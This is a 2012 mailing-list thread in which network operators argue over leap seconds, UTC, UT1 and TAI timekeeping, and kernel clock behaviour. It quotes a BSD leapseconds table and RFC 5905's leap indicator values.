Date: Tue, 3 Jul 2012 23:09:53 +0300
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> References: <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> Message-ID: <20120703200953.GA16042@pob.ytti.fi> On (2012-07-03 12:46 -0700), Owen DeLong wrote: > If you don't know that time is not monotonically increasing, then that only becomes a software bug when you codify your own ignorance into software you write. If only all software could be ordered from you Owen, but in practice this is not possible. Some code will be written less intelligent people. And reviewing any code doing foo = timestamp+offset and if now > foo, virtually never expects time to move backwards. UTC doesn't move backwards (it goes 59 -> 60 -> 00). TAI does not move backwards. Unixtime moves backwards, like spanish inquisition no one expects that. > It is well known that leap seconds exist. Quite. But it is not well known that unixtime travels backwards. -- ++ytti From roll at Stupi.SE Tue Jul 3 22:18:24 2012 From: roll at Stupi.SE (Peter Lothberg) Date: Tue, 3 Jul 2012 22:18:24 CEST Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> Message-ID: > > > The system clock needs to be UTC, not UTC =C2=B1 some offset stuck > > > somewhere that keeps some form of running tally of the current leap > > > second offset since the epoch. > > > Nope. UTC *includes* leap seconds already. It's UT1 that does not. > > > Are you suggesting that NTP timekeeping should be based on UT1? > > The system clock should be based on UT1 and should be monotonically increas= > ing since this matches the common concept of time. 
> Calculations done with this value are all based on it being UT1 and using the "common" notion of UT1 rules. The root cause of the difficulties is that someone decided that the system clock would not maintain "wall clock" time (UT1) but rather some other timebase and then "step" that time to keep it in sync with UT1.
>
> NTP can keep time in UTC (or anything else) if it wants, but it should discipline the system clock to monotonically increasing UT1.

UTC is the universal time. UT1 is "astronomical time".

As the definition of an atomic second is 9192631770 complete oscillations of cesium 133 between energy level 3 and 4, "everyone" can make a second in their lab, that's TAI. Just add the leapsecond offset and you have UTC.

UT1-UTC is done by observations from radio astronomers VLBI telescopes and a committee, you can't make one in your lab, and it's not real time.

--P

(The only SI metric you can't make is a kilogram, you have to have one of the 28 kilos in the world..)

From roll at Stupi.SE Tue Jul 3 22:21:12 2012
From: roll at Stupi.SE (Peter Lothberg)
Date: Tue, 3 Jul 2012 22:21:12 CEST
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <20120703200953.GA16042@pob.ytti.fi>
Message-ID:

> UTC doesn't move backwards (it goes 59 -> 60 -> 00)

or 58 -> 00

--P

From jra at baylink.com Tue Jul 3 15:26:57 2012
From: jra at baylink.com (Jay Ashworth)
Date: Tue, 3 Jul 2012 16:26:57 -0400 (EDT)
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com>
Message-ID: <5694479.12394.1341347217229.JavaMail.root@benjamin.baylink.com>

----- Original Message -----
> From: "Keith Medcalf"

> > Are you suggesting that NTP timekeeping should be based on UT1?
>
> The system clock should be based on UT1 and should be monotonically
> increasing since this matches the common concept of time. Calculations
> done with this value are all based on it being UT1 and using the
> "common" notion of UT1 rules.
> The root cause of the difficulties is
> that someone decided that the system clock would not maintain "wall
> clock" time (UT1) but rather some other timebase and then "step" that
> time to keep it in sync with UT1.

UTC is monotonic, and is based on UT1. Just not deterministically. :-)

The root cause *is* that someone made a bad decision about kernel timekeeping, but it wasn't the choice of timescale. Non-monotonic time is not a feature of UTC *either*.

> NTP can keep time in UTC (or anything else) if it wants, but it should
> discipline the system clock to monotonically increasing UT1.

As I understand it, the problem is not how NTP disciplined the kernel, it's what the kernel does itself.

Cheers,
-- jra
--
Jay R. Ashworth                  Baylink                       jra at baylink.com
Designer                     The Things I Think                       RFC 2100
Ashworth & Associates     http://baylink.pitas.com         2000 Land Rover DII
St Petersburg FL USA      http://photo.imageinc.us             +1 727 647 1274

From roll at Stupi.SE Tue Jul 3 22:33:02 2012
From: roll at Stupi.SE (Peter Lothberg)
Date: Tue, 3 Jul 2012 22:33:02 CEST
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
Message-ID:

(source http://physics.nist.gov/cuu/Units/second.html )

Unit of time (second)
Abbreviations: CGPM, CIPM, BIPM

The unit of time, the second, was defined originally as the fraction 1/86 400 of the mean solar day. The exact definition of "mean solar day" was left to astronomical theories. However, measurement showed that irregularities in the rotation of the Earth could not be taken into account by the theory and have the effect that this definition does not allow the required accuracy to be achieved. In order to define the unit of time more precisely, the 11th CGPM (1960) adopted a definition given by the International Astronomical Union which was based on the tropical year.
Experimental work had, however, already shown that an atomic standard of time-interval, based on a transition between two energy levels of an atom or a molecule, could be realized and reproduced much more precisely. Considering that a very precise definition of the unit of time is indispensable for the International System, the 13th CGPM (1967) decided to replace the definition of the second by the following (affirmed by the CIPM in 1997 that this definition refers to a cesium atom in its ground state at a temperature of 0 K):

The second is the duration of 9 192 631 770 periods of the radiation corresponding to the transition between the two hyperfine levels of the ground state of the cesium 133 atom.

If anyone still thinks UT1; We have a NTP server on Earth (say Washington-DC) and Vint has extended the Internet to planet Mars, can we use NTP?

(Hints: Looking at the clock on Earth from Mars, you see a satellite with an orbit, gravity changes by other planets, unknown distance, unknown orbits and time runs faster on Mars than on Earth..)

--P

From eugen at leitl.org Tue Jul 3 15:47:52 2012
From: eugen at leitl.org (Eugen Leitl)
Date: Tue, 3 Jul 2012 22:47:52 +0200
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References: <24843980.12324.1341343456309.JavaMail.root@benjamin.baylink.com>
Message-ID: <20120703204752.GS12615@leitl.org>

On Tue, Jul 03, 2012 at 09:49:40PM +0200, Peter Lothberg wrote:

> I leave the computer kernels out of this for a second..:-)
>
> We have a timescale that runs at constant speed forward it's named
> "TAI", it is based on the definition on the atomic second.

Notice that in inertial frame dragging context it's provably impossible to synchronize oscillators. Luckily, Earth has negligible frame dragging, for the kind of accuracy we currently need.
For operative values of time lunaticism, there's always http://www.leapsecond.com/time-nuts.htm

From bicknell at ufp.org Tue Jul 3 15:52:56 2012
From: bicknell at ufp.org (Leo Bicknell)
Date: Tue, 3 Jul 2012 13:52:56 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <20120703204752.GS12615@leitl.org>
References: <24843980.12324.1341343456309.JavaMail.root@benjamin.baylink.com> <20120703204752.GS12615@leitl.org>
Message-ID: <20120703205256.GA25086@ussenterprise.ufp.org>

In a message written on Tue, Jul 03, 2012 at 10:47:52PM +0200, Eugen Leitl wrote:
> Notice that in inertial frame dragging context it's provably
> impossible to synchronize oscillators. Luckily, Earth has
> negligible frame dragging, for the kind of accuracy we
> currently need.

I think everyone on this list is going in the wrong direction with this issue. What you're all arguing over is the "correct time" for some definition of "correct".

I'm a bit more practical. How about we write software so a leap second doesn't crash everything? We can then allow the time nuts get back to arguing which leap seconds we should use, or time reference, or whatever.

I'd even take off by a second but didn't crash, over crashed.

--
Leo Bicknell - bicknell at ufp.org - CCIE 3440
PGP keys at http://www.ufp.org/~bicknell/

From valdis.kletnieks at vt.edu Tue Jul 3 15:54:24 2012
From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu)
Date: Tue, 03 Jul 2012 16:54:24 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: Your message of "Tue, 03 Jul 2012 21:49:40."
References:
Message-ID: <49423.1341348864@turing-police.cc.vt.edu>

On Tue, 03 Jul 2012 21:49:40, Peter Lothberg said:

> Leapseconds can be both positive and negative, but up to now, the
> earth has only slowed down, so we have added seconds.
That's what many people believe, but it's not exactly right. Leap seconds are added for the exact same reason leap days are - the earth's rotation isn't a clean multiple of the year. We know we need to stick in an entire leap day every 4 years or so, then add the 400 hack to get it closer. At that point, it's *really* close, to the point where just shimming in a second every once in a while is enough to get it back in sync.

The earth's slowdown (or speedup) is measured by *how often* we need to add leap seconds. If we needed to add one every 3 years, but the frequency rises to once every 2.5 years, *that* indicates slowing. In other words, the slowdown or speedup is the first derivative of the rate that UT and TAI diverge - if the earth rotated at constant speed, the derivative would be zero, and we'd insert leap seconds on a nice predictable schedule.

From roll at Stupi.SE Tue Jul 3 23:06:20 2012
From: roll at Stupi.SE (Peter Lothberg)
Date: Tue, 3 Jul 2012 23:06:20 CEST
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <49423.1341348864@turing-police.cc.vt.edu>
Message-ID:

UTC and time is defined as part of the SI system and ITU etc, so we just need to implement the time system correct. If you try to invent your own way, there are surprises we don't need to re-explore..

> On Tue, 03 Jul 2012 21:49:40, Peter Lothberg said:
>
> > Leapseconds can be both positive and negative, but up to now, the
> > earth has only slowed down, so we have added seconds.
>
> That's what many people believe, but it's not exactly right. Leap seconds
> are added for the exact same reason leap days are - the earth's rotation
> isn't a clean multiple of the year. We know we need to stick in an entire
> leap day every 4 years or so, then add the 400 hack to get it closer.
> At that point, it's *really* close, to the point where just shimming in a second
> every once in a while is enough to get it back in sync.
>
> The earth's slowdown (or speedup) is measured by *how often* we
> need to add leap seconds. If we needed to add one every 3 years, but
> the frequency rises to once every 2.5 years, *that* indicates slowing.
> In other words, the slowdown or speedup is the first derivative of
> the rate that UT and TAI diverge - if the earth rotated at constant
> speed, the derivative would be zero, and we'd insert leap seconds on
> a nice predictable schedule.

I'm not an astronomer, but some of the errors we have in the second intention ended up in the earth position measurements, so the table is not nicely spaced..

On one of my BSD boxes. /usr/src/share/zoneinfo/leapseconds, I see no "-"

# @(#)leapseconds 7.17
# Allowance for leapseconds added to each timezone file.
# The International Earth Rotation Service periodically uses leap seconds
# to keep UTC to within 0.9 s of UT1
# (which measures the true angular orientation of the earth in space); see
# Terry J Quinn, The BIPM and the accurate measure of time,
# Proc IEEE 79, 7 (July 1991), 894-905.
# There were no leap seconds before 1972, because the official mechanism
# accounting for the discrepancy between atomic time and the earth's rotation
# did not exist until the early 1970s.
# The correction (+ or -) is made at the given time, so lines
# will typically look like:
#   Leap  YEAR  MON  DAY  23:59:60  +  R/S
# or
#   Leap  YEAR  MON  DAY  23:59:59  -  R/S
# If the leapsecond is Rolling (R) the given time is local time
# If the leapsecond is Stationary (S) the given time is UTC
# Leap  YEAR  MONTH  DAY  HH:MM:SS  CORR  R/S
Leap  1972  Jun  30  23:59:60  +  S
Leap  1972  Dec  31  23:59:60  +  S
Leap  1973  Dec  31  23:59:60  +  S
Leap  1974  Dec  31  23:59:60  +  S
Leap  1975  Dec  31  23:59:60  +  S
Leap  1976  Dec  31  23:59:60  +  S
Leap  1977  Dec  31  23:59:60  +  S
Leap  1978  Dec  31  23:59:60  +  S
Leap  1979  Dec  31  23:59:60  +  S
Leap  1981  Jun  30  23:59:60  +  S
Leap  1982  Jun  30  23:59:60  +  S
Leap  1983  Jun  30  23:59:60  +  S
Leap  1985  Jun  30  23:59:60  +  S
Leap  1987  Dec  31  23:59:60  +  S
Leap  1989  Dec  31  23:59:60  +  S
Leap  1990  Dec  31  23:59:60  +  S
Leap  1992  Jun  30  23:59:60  +  S
Leap  1993  Jun  30  23:59:60  +  S
Leap  1994  Jun  30  23:59:60  +  S
Leap  1995  Dec  31  23:59:60  +  S
Leap  1997  Jun  30  23:59:60  +  S
Leap  1998  Dec  31  23:59:60  +  S
Leap  2005  Dec  31  23:59:60  +  S
Leap  2008  Dec  31  23:59:60  +  S
Leap  2012  Jun  30  23:59:60  +  S
# INTERNATIONAL EARTH ROTATION AND REFERENCE SYSTEMS SERVICE (IERS)
#
# SERVICE INTERNATIONAL DE LA ROTATION TERRESTRE ET DES SYSTEMES DE REFERENCE
#
# SERVICE DE LA ROTATION TERRESTRE
# OBSERVATOIRE DE PARIS
# 61, Av. de l'Observatoire 75014 PARIS (France)
# Tel.     : 33 (0) 1 40 51 22 26
# FAX      : 33 (0) 1 40 51 22 91
# Internet : services.iers at obspm.fr

From jra at baylink.com Tue Jul 3 16:08:09 2012
From: jra at baylink.com (Jay Ashworth)
Date: Tue, 3 Jul 2012 17:08:09 -0400 (EDT)
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <20120703205256.GA25086@ussenterprise.ufp.org>
Message-ID: <4559615.12396.1341349689104.JavaMail.root@benjamin.baylink.com>

----- Original Message -----
> From: "Leo Bicknell"

> I'd even take off by a second but didn't crash, over crashed.

You would, but lots of people would not, and that's not the contract made by the API definition.
If you want to run a Google-patched NTP server and talk to it, you're welcome to. The rest of us would prefer to just get it right, so we don't have to get lied to.

Cheers,
-- jra
--
Jay R. Ashworth                  Baylink                       jra at baylink.com
Designer                     The Things I Think                       RFC 2100
Ashworth & Associates     http://baylink.pitas.com         2000 Land Rover DII
St Petersburg FL USA      http://photo.imageinc.us             +1 727 647 1274

From dot at dotat.at Tue Jul 3 16:24:39 2012
From: dot at dotat.at (Tony Finch)
Date: Tue, 3 Jul 2012 22:24:39 +0100
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com>
References: <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com>
Message-ID:

Owen DeLong wrote:
>
> Since we have a tradition of measuring diurnal and other repetitive
> cycles (days) based on the rotation of the earth, we end up with fudge
> factors to make that line up with months from time to time. (leap
> seconds).

That is not what leap seconds are. Leap seconds are to align the artificial and very stable atomic timescale with the irregular and slowing rotation of the earth.

Tony.
--
f.anthony.n.finch  http://dotat.at/
Faeroes, South-east Iceland: Easterly 5 or 6, backing northeasterly 4 or 5. Moderate. Occasional rain, fog patches in Faeroes. Moderate or good, occasionally very poor in Faeroes.

From dot at dotat.at Tue Jul 3 16:28:04 2012
From: dot at dotat.at (Tony Finch)
Date: Tue, 3 Jul 2012 22:28:04 +0100
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References:
Message-ID:

Peter Lothberg wrote:
>
> We have a NTP server on Earth (say Washington-DC) and Vint has
> extended the Internet to planet Mars, can we use NTP?

No. http://fanf.livejournal.com/116480.html

Tony.
--
f.anthony.n.finch  http://dotat.at/
Rockall: Cyclonic, becoming northerly later, 4 or 5, occasionally 6 in far north. Moderate or rough. Rain or showers. Moderate or good, occasionally poor.

From dot at dotat.at Tue Jul 3 16:35:13 2012
From: dot at dotat.at (Tony Finch)
Date: Tue, 3 Jul 2012 22:35:13 +0100
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References:
Message-ID:

Peter Lothberg wrote:
>
> As the definition of an atomic second is 9192631770 complete
> oscillations of cesium 133 between energy level 3 and 4, "everyone" can
> make a second in their lab, that's TAI.

No, TAI isn't based on the SI second you realise in your lab. It's the SI second realised on the geoid by a large fleet of clocks. If you are on Mars then TAI isn't based on your SI second, because TAI doesn't tick at a fixed rate relative to local proper time owing to the orbital differences of the two planets.

> UT1-UTC is done by observations from radio astronomers VLBI telescopes
> and a committee, you can't make one in your lab, and it's not real
> time.

You can make quite a good approximation to UT1 with a transit instrument and knowledge of your position.

Tony.
--
f.anthony.n.finch  http://dotat.at/
Forties, Cromarty, Forth, Tyne, Dogger: Southeasterly 4 or 5. Slight or moderate. Rain or drizzle, fog banks. Moderate or poor, occasionally very poor.

From dot at dotat.at Tue Jul 3 16:40:09 2012
From: dot at dotat.at (Tony Finch)
Date: Tue, 3 Jul 2012 22:40:09 +0100
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <49423.1341348864@turing-police.cc.vt.edu>
References: <49423.1341348864@turing-police.cc.vt.edu>
Message-ID:

valdis.kletnieks at vt.edu wrote:
>
> Leap seconds are added for the exact same reason leap days are - the
> earth's rotation isn't a clean multiple of the year.

No, leap seconds have nothing to do with years.

Tony.
--
f.anthony.n.finch  http://dotat.at/
Rockall: Cyclonic, becoming northerly later, 4 or 5, occasionally 6 in far north. Moderate or rough. Rain or showers. Moderate or good, occasionally poor.

From dot at dotat.at Tue Jul 3 16:50:38 2012
From: dot at dotat.at (Tony Finch)
Date: Tue, 3 Jul 2012 22:50:38 +0100
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References:
Message-ID:

Peter Lothberg wrote:

> And I forgot: They made a "mistake" and missed their intentions of a
> solar day year 1900 when defining the atomic second. Off by 2s in 100
> years.

No that is not correct, or at least it's nowhere near as simple as that. The atomic second was matched to the second of ephemeris time, and that was based on Newcomb's tables of the sun, which in effect used the average length of the second from the 1800s.

http://ucolick.org/~sla/leapsecs/dutc.html

Tony.
--
f.anthony.n.finch  http://dotat.at/
Viking, North Utsire, South Utsire: Southeasterly 4 or 5, increasing 6 at times. Moderate. Occasional rain, fog patches. Moderate, occasionally very poor.

From smb at cs.columbia.edu Tue Jul 3 16:54:59 2012
From: smb at cs.columbia.edu (Steven Bellovin)
Date: Tue, 3 Jul 2012 17:54:59 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References:
Message-ID:

On Jul 3, 2012, at 5:06 PM, Peter Lothberg wrote:

>
> On one of my BSD boxes. /usr/src/share/zoneinfo/leapseconds, I see no
> "-"

No, but they're allowed; see Figure 9 of RFC 5905:

   LI Leap Indicator (leap): 2-bit integer warning of an impending leap
   second to be inserted or deleted in the last minute of the current
   month with values defined in Figure 9.
   +-------+----------------------------------------+
   | Value | Meaning                                |
   +-------+----------------------------------------+
   |   0   | no warning                             |
   |   1   | last minute of the day has 61 seconds  |
   |   2   | last minute of the day has 59 seconds  |
   |   3   | unknown (clock unsynchronized)         |
   +-------+----------------------------------------+

                  Figure 9: Leap Indicator

--Steve Bellovin, https://www.cs.columbia.edu/~smb

From kmedcalf at dessus.com Tue Jul 3 17:20:14 2012
From: kmedcalf at dessus.com (Keith Medcalf)
Date: Tue, 03 Jul 2012 16:20:14 -0600
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
Message-ID: <85c752350c2e434f9c86242d474c4614@mail.dessus.com>

> Leap seconds are to align the artificial and very stable atomic timescale
> with the irregular and slowing rotation of the earth.

You are assuming facts not in evidence. The rotation is merely irregular within the capabilities of our scheme of measurement, calculation, and observation. Once upon a time eclipses of the sun and moon were "random magic", before the mechanism was understood. So too the periodic cycles of the rotation of the earth about its axis, the planet about the sun, etc., are viewed as "magical". This is not due to magic, but rather limitations of understanding.

Leap seconds are to align the artificial timescale (which we presently assume, based on facts not in evidence) to be very stable with the simple observation of the equinox and zenith of the sun, on which "time" reckoning is based.

---
()  ascii ribbon campaign against html e-mail
/\  www.asciiribbon.org

From dot at dotat.at Tue Jul 3 17:33:22 2012
From: dot at dotat.at (Tony Finch)
Date: Tue, 3 Jul 2012 23:33:22 +0100
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <85c752350c2e434f9c86242d474c4614@mail.dessus.com>
References: <85c752350c2e434f9c86242d474c4614@mail.dessus.com>
Message-ID:

Keith Medcalf wrote:
>
> You are assuming facts not in evidence.
> The rotation is merely
> irregular within the capabilities of our scheme of measurement,
> calculation, and observation.

There is LOTS of evidence that the earth's rotation is irregular. VLBI, laser ranging of the moon, etc. This was known long before the atomic clock was invented, and it is why the definition of the second was changed from one based on earth rotation to one based on Newcomb's ephemerides, before the change to an atomic second.

Tony.
--
f.anthony.n.finch  http://dotat.at/
Hebrides, Bailey: East backing northeast 5 or 6, decreasing 4 later in Hebrides. Rough in Bailey at first, otherwise moderate. Rain at times, fog patches. Moderate, occasionally very poor.

From msa at latt.net Tue Jul 3 17:45:27 2012
From: msa at latt.net (Majdi S. Abbas)
Date: Tue, 3 Jul 2012 18:45:27 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References: <85c752350c2e434f9c86242d474c4614@mail.dessus.com>
Message-ID: <20120703224527.GD29131@puck.nether.net>

On Tue, Jul 03, 2012 at 11:33:22PM +0100, Tony Finch wrote:
> Keith Medcalf wrote:
> >
> > You are assuming facts not in evidence. The rotation is merely
> > irregular within the capabilities of our scheme of measurement,
> > calculation, and observation.
>
> There is LOTS of evidence that the earth's rotation is irregular. VLBI,
> laser ranging of the moon, etc. This was known long before the atomic
> clock was invented, and it is why the definition of the second was changed
> from one based on earth rotation to one based on Newcomb's ephemerides,
> before the change to an atomic second.

	This. Shoot, seismic activity has a measurable effect. The best we can do is approximate it and align the timescales as needed. There's no lack of understanding here, just a changing planet.

	Now, changing your kernel's leap second handler and not testing it, well, you can't blame that one on the ITU or the aforementioned planet.
	--msa

From kmedcalf at dessus.com Tue Jul 3 17:56:13 2012
From: kmedcalf at dessus.com (Keith Medcalf)
Date: Tue, 03 Jul 2012 16:56:13 -0600
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
Message-ID: <2a30ca40148ece4587271b42b8cfe7e9@mail.dessus.com>

Tony Finch wrote:
> Keith Medcalf wrote:
> > You are assuming facts not in evidence. The rotation is merely
> > irregular within the capabilities of our scheme of measurement,
> > calculation, and observation.

> There is LOTS of evidence that the earth's rotation is irregular. VLBI,
> laser ranging of the moon, etc. This was known long before the atomic
> clock was invented, and it is why the definition of the second was changed
> from one based on earth rotation to one based on Newcomb's ephemerides,
> before the change to an atomic second.

What you mean is that it is subject to periodicities and forces which you do not understand, and that within your limited perception, this ignorance is taken as "irregularity". Just because the system encompasses rules and properties beyond your understanding and observation does not mean that it is magic.

It is impossible for the earth's rotation to be irregular, just as it is impossible for the orbit around the sun to be irregular, or the orbit of the solar system within the galaxy, or the galaxy within the universe, or the universe within the multiverse, to be irregular. The irregularity is due to inability to comprehend the rather simple set of rules governing the motion, or failures of observation.

Once upon a time (not too long ago) the orbit of Pluto was thought to be "irregular". It was not. There was another body right where it would be expected to be found affecting the orbit of Pluto. All that was required to "discover" it was someone who applied logical thought processes rather than magical thought processes to the observed data.

The earth's rotation and orbit is perfectly regular.
Your error is one of assumption and a failure to admit that your knowledge is imperfect.

** "your" is the general y'all, not you in particular **

---
()  ascii ribbon campaign against html e-mail
/\  www.asciiribbon.org

From avg at kotovnik.com Tue Jul 3 18:02:29 2012
From: avg at kotovnik.com (Vadim Antonov)
Date: Tue, 03 Jul 2012 16:02:29 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References:
Message-ID: <4FF37A05.7040305@kotovnik.com>

On 7/3/2012 2:35 PM, Tony Finch wrote:
> Peter Lothberg wrote:
>>
>> As the definition of an atomic second is 9192631770 complete
>> oscillations of cesium 133 between energy level 3 and 4, "everyone" can
>> make a second in their lab, that's TAI.
>
> No, TAI isn't based on the SI second you realise in your lab. It's the SI
> second realised on the geoid by a large fleet of clocks.

I think if anyone here is well aware of that that'd be Peter:)

The reason for the fleet of clocks is partly political, partly practical (cesium clocks are not the most precise... so averaging between a bunch of them is used to calibrate better master clocks). But in theory, if you can get the technical wrinkles worked out, you can derive the same frequency standard in your lab with a single instrument.

(One more issue is that non-relativistic time is not only the frequency of oscillators, but also a reference point).

--vadim

From dot at dotat.at Tue Jul 3 18:08:25 2012
From: dot at dotat.at (Tony Finch)
Date: Wed, 4 Jul 2012 00:08:25 +0100
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <2a30ca40148ece4587271b42b8cfe7e9@mail.dessus.com>
References: <2a30ca40148ece4587271b42b8cfe7e9@mail.dessus.com>
Message-ID:

Keith Medcalf wrote:
>
> What you mean is that it is subject to periodicities and forces which
> you do not understand, and that within your limited perception, this
> ignorance is taken as "irregularity".
> Just because the system
> encompasses rules and properties beyond your understanding and
> observation does not mean that it is magic.

You seem to have a strange interpretation of the word "irregular". All I mean is that it does not rotate at a regular rate, i.e. smoothly. It is not a regular oscillator.

Tony.
--
f.anthony.n.finch  http://dotat.at/
Cromarty, Forth, Tyne, Dogger: Southeast 4 or 5, decreasing 3 at times. Slight or moderate. Rain or drizzle, fog patches. Moderate, occasionally very poor.

From dot at dotat.at Tue Jul 3 18:15:09 2012
From: dot at dotat.at (Tony Finch)
Date: Wed, 4 Jul 2012 00:15:09 +0100
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <4FF37A05.7040305@kotovnik.com>
References: <4FF37A05.7040305@kotovnik.com>
Message-ID:

Vadim Antonov wrote:
>
> But in theory, if you can get the technical wrinkles worked out, you can
> derive the same frequency standard in your lab with a single instrument.
>
> (One more issue is that non-relativistic time is not only the frequency of
> oscillators, but also a reference point).

Your parenthetical point explains why TAI does not tick at the same rate as the SI second in your lab, especially if your lab is (for example) in Colorado. You have to adjust the frequency depending on your difference in gravitational potential from the geoid.

Tony.
--
f.anthony.n.finch  http://dotat.at/
Biscay: West or southwest 4 or 5, decreasing 3 at times. Moderate. Rain then showers. Moderate or good, occasionally poor at first.

From owen at delong.com Tue Jul 3 18:48:14 2012
From: owen at delong.com (Owen DeLong)
Date: Tue, 3 Jul 2012 16:48:14 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com>
References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com>
Message-ID: <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com>

On Jul 3, 2012, at 1:08 PM, Keith Medcalf wrote:

>
>>> The system clock needs to be UTC, not UTC ±
>>> some offset stuck
>>> somewhere that keeps some form of running tally of the current leap
>>> second offset since the epoch.
>
>> Nope. UTC *includes* leap seconds already. It's UT1 that does not.
>
>> Are you suggesting that NTP timekeeping should be based on UT1?
>
> The system clock should be based on UT1 and should be monotonically increasing since this matches the common concept of time. Calculations done with this value are all based on it being UT1 and using the "common" notion of UT1 rules. The root cause of the difficulties is that someone decided that the system clock would not maintain "wall clock" time (UT1) but rather some other timebase and then "step" that time to keep it in sync with UT1.
>

It only matches the common concept of time at some particular instant. Over the course of several years it will become less and less aligned with the common concept of time. Most people operate on the assumption that there are 86400*365.25 seconds per year overall and that every day is 86,400 seconds. UTC matches that common conception of time. UT1 does not because UT1 monotonically increments one second for every elapsed second of time and continues to drift out of synchronization with the celestial phenomena on which the common conception of time is based.

> NTP can keep time in UTC (or anything else) if it wants, but it should discipline the system clock to monotonically increasing UT1.

This will break many many currently correct applications and is not a change that should be undertaken lightly. Especially not if it is intended to fix a moderately esoteric bug in a few things that crops up once per decade or so.

Owen

From owen at delong.com Tue Jul 3 18:53:32 2012
From: owen at delong.com (Owen DeLong)
Date: Tue, 3 Jul 2012 16:53:32 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <20120703200953.GA16042@pob.ytti.fi>
References: <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> <20120703200953.GA16042@pob.ytti.fi>
Message-ID: <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com>

On Jul 3, 2012, at 1:09 PM, Saku Ytti wrote:

> On (2012-07-03 12:46 -0700), Owen DeLong wrote:
>
>> If you don't know that time is not monotonically increasing, then that only becomes a software bug when you codify your own ignorance into software you write.
>
> If only all software could be ordered from you Owen, but in practice this
> is not possible. Some code will be written by less intelligent people. And
> reviewing any code doing foo = timestamp+offset and if now > foo, virtually
> never expects time to move backwards.

Sure, but even with that, 99% of it has only a passing 'interesting' effect and then recovers.

> UTC doesn't move backwards (it goes 59 -> 60 -> 00). TAI does not move
> backwards. Unixtime moves backwards, like the Spanish Inquisition no one
> expects that.

UTC (and the system clock) should not move backwards, but, rather they repeat second 59. UTC goes 58->59->00 most of the time, but during a leap second, it should go 58->59->59->00. It's not so much going backwards as dropping a chime.

>> It is well known that leap seconds exist.
>
> Quite. But it is not well known that unixtime travels backwards.
>

In part because it shouldn't actually do so. It should simply chime 59 twice.

Owen

From sla at ucolick.org Tue Jul 3 18:59:54 2012
From: sla at ucolick.org (Steve Allen)
Date: Tue, 3 Jul 2012 16:59:54 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com>
References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com>
Message-ID: <20120703235954.GA28857@ucolick.org>

Tony Finch dot at dotat.at wrote
> No that is not correct, or at least it's nowhere near as simple as that.
> The atomic second was matched to the second of ephemeris time, and that
> was based on Newcomb's tables of the sun, which in effect used the average
> length of the second from the 1800s.
> http://ucolick.org/~sla/leapsecs/dutc.html

Last fall we held a meeting to consider how UTC might be changed and what the implications of leap seconds were. The proceedings fill 400 pages of a book.

For the sound bite version (only 3 pictures) of leap seconds
http://www.ucolick.org/~sla/leapsecs/amsci.html

For a view of the international legal mess caused by leap seconds
http://www.ucolick.org/~sla/leapsecs/epochtime.html

